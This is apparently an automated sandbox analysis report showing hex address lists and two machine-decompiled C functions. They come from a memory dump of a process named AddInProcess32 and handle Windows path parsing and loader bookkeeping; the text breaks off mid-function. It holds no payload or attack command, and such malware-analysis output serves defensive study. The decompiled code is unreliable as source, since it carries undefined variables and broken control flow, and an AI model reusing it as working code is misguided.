0x01926260
0x01926260
0x0192625e
0x01926264
0x01926267
0x01926269
0x01926315
0x01926315
0x0192631b
0x0192631e
0x01926324
0x01926327
0x0192632f
0x01926330
0x01926333
0x0192633a
0x0192633c
0x01926335
0x01926335
0x01926335
0x0192633f
0x01926342
0x0192634c
0x01926352
0x01926355
0x01926355
0x01926359
0x00000000
0x0192626f
0x01926275
0x01926275
0x01926278
0x0192627e
0x0192627e
0x01926281
0x01926287
0x0192628d
0x01926298
0x0192629c
0x019262a2
0x0192629e
0x0192629e
0x0192629e
0x019262a7
0x019262a7
0x019262aa
0x019262b0
0x019262f0
0x019262f0
0x019262f2
0x019262f8
0x019262fd
0x019262b2
0x019262b2
0x019262b2
0x019262b5
0x019262dd
0x019262e2
0x019262e5
0x019262b7
0x019262b8
0x019262bb
0x019262bd
0x019262c0
0x019262c4
0x019262cd
0x019262cd
0x019262c0
0x019262bb
0x019262b5
0x01926302
0x01926303
0x01926305
0x01926305
0x01926305
0x0192630c
0x0192630c
0x00000000
0x0192627e
0x01926269
0x01925eac
0x01925ebb
0x01925ebe
0x01925ecb
0x01925ecb
0x01925ece
0x01925ece
0x01925ed4
0x01925ed7
0x01925ed9
0x01925edb
0x01925edb
0x01925ee1
0x01925ee1
0x01925ee3
0x01925f20
0x01925f20
0x01925ee5
0x01925ee5
0x01925ee5
0x01925ee8
0x01925f11
0x01925f18
0x01925eea
0x01925eea
0x01925eed
0x01925ef2
0x01925ef8
0x01925efb
0x01925f0a
0x01925f0a
0x01925eed
0x01925ee8
0x01925f22
0x01925f28
0x00000000
0x00000000
0x01925f30
0x01925f31
0x01925f37
0x01925f3a
0x01925f3d
0x01925f44
0x00000000
0x00000000
0x00000000
0x01925f46
0x01925f48
0x01925f4d
0x00000000
0x01925f4d
0x01925dda
0x01925ddf
0x00000000
0x01925ddf
0x01925dd8
0x01925da7
0x01925da9
0x01925dac
0x01925dae
0x00000000
0x01925db4
0x01925db4
0x00000000
0x01925db4
0x01925dae
0x01925d88
0x01925d8d
0x01926363
0x01926369
0x0192636a
0x01926370
0x01926372
0x0192637a
0x0192637b
0x0192637d
0x00000000
0x00000000
0x0192637f
0x01926385
0x00000000
0x01926385
0x01925d38
0x01925d3b
0x00000000
0x00000000
0x00000000
0x01925d3b
0x01925d27
0x01925d29
0x00000000
0x00000000
0x00000000
0x01926360
0x00000000
0x01926360
0x01925c10
0x01925c10
0x019263da
0x019263e5
0x019263e5

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7f6408b046527c8d6105c2507f10a1392301f51e3c5cc1e1e0ae0bbc5e443f
Instruction ID: 3f7e54edf85d4002e315a349be9f3ccf5aa85b876e22a0fda7faf77797d82975
Opcode Fuzzy Hash: 4c7f6408b046527c8d6105c2507f10a1392301f51e3c5cc1e1e0ae0bbc5e443f
Instruction Fuzzy Hash: 83426E75D00229CFEB24CF68C880BA9BBB5FF45305F1581AAD94DEB246D734AA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01874120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01874120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x194d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0188F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01876E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01874620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01876E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M018745F8))) {
												case 0:
													_v568 = 0x1831078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x18311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01874620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0189F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0189F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E018552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0186EB70(1, 0x19479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0186AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E018995D0();
																			L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0189B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01893D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0189B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01874128
0x01874135
0x0187413c
0x01874141
0x01874145
0x01874147
0x0187414e
0x01874151
0x01874159
0x0187415c
0x01874160
0x01874164
0x01874168
0x0187416c
0x0187417f
0x01874181
0x0187446a
0x0187446a
0x0187418c
0x01874195
0x01874199
0x01874432
0x01874439
0x0187443d
0x01874442
0x01874447
0x00000000
0x0187419f
0x018741a3
0x018741b1
0x018741b9
0x018741bd
0x018745db
0x018745db
0x00000000
0x018741c3
0x018741c3
0x018741ce
0x018741d4
0x018be138
0x018be13e
0x018be169
0x018be16d
0x018be19e
0x018be16f
0x018be16f
0x018be175
0x018be179
0x018be18f
0x018be193
0x00000000
0x018be199
0x00000000
0x018be199
0x018be193
0x00000000
0x00000000
0x00000000
0x018741da
0x018741da
0x018741df
0x018741e4
0x018741ec
0x01874203
0x01874207
0x018be1fd
0x01874222
0x01874226
0x018be1f3
0x018be1f3
0x0187422c
0x0187422c
0x01874233
0x018be1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01874239
0x01874239
0x01874239
0x01874239
0x01874233
0x01874226
0x018741ee
0x018741ee
0x018741f4
0x01874575
0x018be1b1
0x018be1b1
0x00000000
0x0187457b
0x0187457b
0x01874582
0x018be1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01874588
0x01874588
0x0187458c
0x018be1c4
0x018be1c4
0x00000000
0x01874592
0x01874592
0x01874599
0x018be1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0187459f
0x0187459f
0x018745a3
0x018be1d7
0x018be1e4
0x00000000
0x018745a9
0x018745a9
0x018745b0
0x018be1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x018745b6
0x018745b6
0x018745b6
0x00000000
0x018745b6
0x018745b0
0x018745a3
0x01874599
0x0187458c
0x01874582
0x00000000
0x00000000
0x00000000
0x00000000
0x018741f4
0x0187423e
0x01874241
0x018745c0
0x018745c4
0x00000000
0x018745ca
0x018745ca
0x00000000
0x018be207
0x018be20f
0x00000000
0x00000000
0x00000000
0x00000000
0x018745d1
0x00000000
0x00000000
0x018745ca
0x00000000
0x01874247
0x01874247
0x01874247
0x01874249
0x01874249
0x01874249
0x01874251
0x01874251
0x01874257
0x0187425f
0x0187426e
0x01874270
0x0187427a
0x018be219
0x018be219
0x01874280
0x01874282
0x01874456
0x018745ea
0x00000000
0x018745f0
0x018be223
0x00000000
0x018be223
0x0187445c
0x0187445c
0x00000000
0x0187445c
0x00000000
0x01874288
0x0187428c
0x018be298
0x01874292
0x01874292
0x0187429e
0x018742a3
0x018742a7
0x018742ac
0x018be22d
0x018742b2
0x018742b2
0x018742b9
0x018742bc
0x018742c2
0x018742ca
0x018742cd
0x018742cd
0x018742d4
0x0187433f
0x0187433f
0x018742d6
0x018742d6
0x018742d9
0x018742dd
0x018742eb
0x018be23a
0x018742f1
0x01874305
0x0187430d
0x01874315
0x01874318
0x0187431f
0x01874322
0x0187432e
0x0187433b
0x0187433b
0x00000000
0x0187432e
0x018742eb
0x0187434c
0x0187434e
0x01874352
0x01874359
0x0187435e
0x01874361
0x0187436e
0x0187438a
0x0187438e
0x01874396
0x0187439e
0x018743a1
0x018743ad
0x018743bb
0x018743bb
0x018743ad
0x0187436e
0x018743bf
0x018743c5
0x01874463
0x01874463
0x018743ce
0x018743d5
0x018743d9
0x018743df
0x01874475
0x01874479
0x01874491
0x01874491
0x01874479
0x018743e5
0x018743eb
0x018743f4
0x018743f6
0x018743f9
0x018743fc
0x018743ff
0x018744e8
0x018744ed
0x018744f3
0x018be247
0x00000000
0x018744f9
0x01874504
0x01874508
0x0187450f
0x018be269
0x00000000
0x01874515
0x01874519
0x01874531
0x01874534
0x01874537
0x0187453e
0x01874541
0x0187454a
0x018be255
0x018be255
0x018be25b
0x018be25e
0x018be261
0x018be261
0x01874555
0x01874559
0x0187455d
0x018be26d
0x018be270
0x018be274
0x018be27a
0x018be27d
0x018be28e
0x018be28e
0x01874563
0x01874563
0x01874569
0x01874569
0x00000000
0x0187455d
0x0187450f
0x00000000
0x018744f3
0x018743ff
0x01874405
0x01874405
0x01874405
0x018742ac
0x0187428c
0x01874282
0x01874407
0x0187440d
0x018be2af
0x018be2af
0x01874413
0x01874413
0x00000000
0x018741d4
0x00000000
0x018741c3
0x018741bd
0x01874415
0x01874415
0x01874416
0x01874417
0x01874429
0x0187416e
0x0187416e
0x01874175
0x01874498
0x0187449f
0x018be12d
0x00000000
0x018be133
0x00000000
0x018be133
0x018744a5
0x018744a5
0x018744aa
0x00000000
0x018744bb
0x018744ca
0x018744d6
0x018744d7
0x018744d8
0x018744e3
0x018744e3
0x018744aa
0x0187417b
0x0187417b
0x0187417b
0x00000000
0x0187417b
0x01874175
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a5334d6c4b460b25b749c80bb847b5206ca452b5588ccf7b01eb3fdfe6cf2c
Instruction ID: f99e28dbe4c7cc914aca6cb3637a260cbcdacd804de02703c7f362cca4826230
Opcode Fuzzy Hash: 96a5334d6c4b460b25b749c80bb847b5206ca452b5588ccf7b01eb3fdfe6cf2c
Instruction Fuzzy Hash: 29F1AE706086118FC724CF18C480ABABBE1FF88718F15492EF99ACB351E734DA95DB52

Uniqueness

Uniqueness Score: -1.00%

Function 018820A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E018820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1948714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01882EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01882EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E018558EC(_t240);
									_t221 =  *0x1945cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1945cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01894A2C(0x1946e40, 0x1894b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01877D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1835c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0188F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0188F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E018D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01872400(_t267 + 0x20);
															}
															L01872400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01882397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01872280(_t134, 0x1948608);
									__eflags =  *0x1946e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0186FFB0(_t198, _t241, 0x1948608);
										__eflags = _t253;
										if(_t253 != 0) {
											L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1946e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1948608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01886B90(_t210,  &_v64);
										_t262 =  *0x1948608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0188E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E018997C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
